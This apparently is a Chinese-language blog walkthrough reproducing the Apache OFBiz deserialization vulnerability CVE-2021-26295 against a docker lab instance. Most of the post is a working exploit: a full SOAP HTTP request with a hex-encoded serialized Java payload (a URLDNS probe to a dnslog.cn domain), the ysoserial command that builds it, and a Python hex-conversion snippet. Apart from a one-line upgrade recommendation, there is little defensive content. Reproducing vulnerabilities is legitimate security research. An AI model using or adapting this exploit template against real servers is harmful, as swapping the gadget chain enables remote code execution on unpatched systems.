Apache OFBiz rmi反序列化漏洞(CVE-2021-26295)复现

简介

 

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统

 

影响版本

apache:ofbiz: <17.12.06


 

环境搭建

docker run -d -p 811:8080 -p 8443:8443  opensourceknight/ofbiz

 

Apache OFBiz rmi反序列化漏洞(CVE-2021-26295)复现


 

漏洞复现

 

构建数据包

POST /webtools/control/SOAPService HTTP/1.1Host: 192.168.204.131:811Content-Length: 1023Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/xmlOrigin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfncAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ser>    <map-HashMap>        <map-Entry>            <map-Key>                <cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74001033346669706e2e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f33346669706e2e646e736c6f672e636e78cus-obj>            map-Key>            <map-Value>                <std-String value="http://34fipn.dnslog.cn"/>            map-Value>        map-Entry>    map-HashMap>ser>soapenv:Body>soapenv:Envelope>


中间的cus-obj 直接用

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS  http://34fipn.dnslog.cn >1.ot


然后转成hex 即可

import binasciifilename = '1.ot'with open(filename, 'rb') as f:    content = f.read()print(binascii.hexlify(content))

Apache OFBiz rmi反序列化漏洞(CVE-2021-26295)复现

Apache OFBiz rmi反序列化漏洞(CVE-2021-26295)复现



修复建议

 

升级到安全版本

https://ofbiz.apache.org/download.html#vulnerabilities



版权归原作者所有,如若转载,请注明出处:https://www.ciocso.com/article/494.html

发表评论

登录后才能评论
跳至工具栏